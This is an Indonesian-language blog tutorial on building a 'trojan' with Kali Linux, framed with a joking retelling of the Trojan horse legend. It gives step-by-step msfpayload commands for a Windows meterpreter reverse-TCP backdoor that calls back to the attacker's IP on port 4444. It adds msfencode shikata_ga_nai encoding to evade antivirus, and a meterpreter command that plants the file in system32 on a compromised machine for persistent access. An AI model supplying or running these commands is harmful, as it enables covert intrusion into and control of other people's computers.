David ButarButar: Cara Membuat Trojan Di Kali Linux

hmmm , apa yang kalian lakukan jika kalian berhasil memasuki system target dan ternyata system target memahami apa yang sedang terjadi di dalam system nya ? Ouhhh pasti nya sang pemilik system akan menutup celah tersebut dan akan menyusahkan kalian , cara ini yang sering di gunakan oleh hacker untuk terus bisa masuk ke dalam system tersebut , yaitu menanam sebuah trojan atau backdoor

pengertian tentang dua hal tersebut dulu oke , apa itu trojan dan backdoor sih ??? bahas dulu Trojan terlebih dahulu oke ….

kalian pernah nonton atau pernah denger film TROY belom ??? jika belom nontonlah asik lhoo ada esex-esex nya juga hahahah , bercanda bung haha , oke sedikit cerita yaak gak seru kalau nggak ada cerita nya

pada dahulu kala ada dua kerajaan dari Yunani dan kota Troya , kerajaan yunani yang ingin menghabiskan wilayah troya menyerang dengan bala tentara yang sangat handal , sedangkan troya juga memiliki pasukan yang tidak kalah handal dalam masalah pertempuran , terjadilah perang yang sangat lama kira-kira 2 bulan sampai 3 bulanan , di akhir peperangan tersebut yunani menyerah dan mengakui kekalahan nya , pemimpin yunani membuatkan sebuah patung kuda terbuat dari kayu yang di serahkan untuk Troya , sedangkan kaum troya menghargai kekalahan lawan nya yang sudah berjuang untuk meruntuhkan tembok besar troya dan akhirnya membawa patung kuda tersebut masuk ke gerbang troya sambil melihat pasukan yunani melaut untuk pulang ke wilayah nya .

Di saat pasukan troya merayakan kemenangan kaum nya dengan membuat pesra besar-besaran di dalam wilayah troya sambil mabuk dan hura-hura dengan senang dan bergembiraria , beberapa saat kemudian penduduk dan pasukan troyapun lelah dan tertidur dengan Istri-istri nya (nggak tau istri orang ikut juga kagak :v ) dengan bangga atas kemenangan nya mereka beristirahat lelap setelah pesra kemudian ada yang berbunya aneh seperti “klutek !!!” ouuh ooo ….. ternyata kuda tersebut pecah dan di dalam nya terdapat pasukan ahli tempur milik yunani dan pasukan yang tadi nya pulang ternyata menunggu di balik pulau , pasukan yang berada di dalam kuda tersebut membuka gerbang yang kokoh dan membiarkan seluruh pasukan yunani masuk dan membumi hanguskan rakyat troya

hmmmmm bayangin aja jika server kalian yang tertanam kuda tersebut dan membuka suatu pintu yang dapat menghanguskan server kalian !? Apa kalian mau ??? :D nah cara ini ni yang biasa nya digunakan oleh para hacker untuk menghindari dari penutupan gerbang atau kelemahan yang berada di dalam server tersebut oke kita mulai membuat trojan dengan menggunakan msfconsole dan msfpayload

saat membuat trojan dan memasukan di dalam server orang lain , otomastis server tersebut memiliki antivirus yang dapat membaca file tersebut , dan disini juga di sharing tentang bagai mana caranya trojan kita tidak dapat di lacak oleh antivirus !

Langkah-langkah nya

1. membuat file trojan dengan menggunakan msfpayload yang akan melakukan koneksi ke IP kalian untuk pangkalan trojan dengan mode listening di port 4444 dalam contoh ini IP adalah 192.168.1.1 dengan port 4444 “msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.232 LPORT=4444 X > /tmp/trojan1.exe”

NOTE :

msfpayload windows/meterpreter/reverse_tcp (mode trojan yang kita buat adalah reverse TCP begitu file ini aktif maka akan memberikan koneksi ke IP yang ada 192.168.1.101)

LHOST=192.168.1.101 ( IP yangakan menerima koneksi untuk trojan yang kita buat tadi )

LPORT=4444 ( adalah port untuk trojan , yang akan di buka di server korban )

tmp/nama-trojan.exe ( nama trojan disini kalian bebas memberi nama trojan kalian dengan nama apa saja yang kalian mau )

naah kalau cuma seperti ini file trojan yang kalian buat sama halnya bohong membuat bom tapi tanpa penutup atau bungkusan yang membuat bom tersebut terlihat seperti bom , karna anti virus akan sangat mudah mendeteksi trojan tersebut , supaya tidak terjadi hal yang tidak di inginkan kalian bisa menggunakan msfencode untuk mempercanggih file trojan tersebut supaya tidak terdeteks oleh anti virus

2. membuat trojan lebih susah di tangkap dengan perintah “msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /tmp/trojan2.exe”

NOTE:

1. Membuka sesi meterpreter.

2. Membuat korban berinteraksi dengan metasploit yang berdiam pada IP address 192.168.1.101 dan mendengarkan pada port 4444

3. File disimpan dalam bentuk RAW (masih mentah, hanya berbentuk text)

4. msfencode melakukan encoding payload dengan x86/shikata_ga_nai

5. msfencode melakukan encoding dengan format ektensi .exe

6. File di beri nama trojan2.exe pada direktori /tmp/

check file nya ada atau tidak dengan menggunakan perintah berikut “ls -al /tmp”

fiuuhh jika hal ini masih saja terbaca dengan antvirus , siapa tau antiviru nya dukun dan paranoit hahaha maka kalian harus memodifikasi hallah kayak motor aja mas hehe udah nurut aja deh dengan perintah seperti berikuut ini “msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 R | msfencode -a x86 -b '\x00\xff' -e x86/shikata_ga_nai -t exe > /tmp/trojan3.exe”

lihat file trojan1 – trojan3 itu virus nya yang mau di upload dengan menggunakan meterpreter , masih ingatkan cara menembus dengan msfconsole yang ada di atas hingga masuk ke sesi meterpreter ???

letikan help untuk melihat semua perintah dan kemampaun meterpreter oke , kita focus untuk upload file ke dalam komputer target dengan printah berikut ini “upload /tmp/trojan3.exe c:\\windows\\system32”

upload /tmp/trojan3.exe adalah perintah yang mana kita akan mengupload filetrojan tersebut di folder komputer target yang lokasi nya “C:\windows\system32”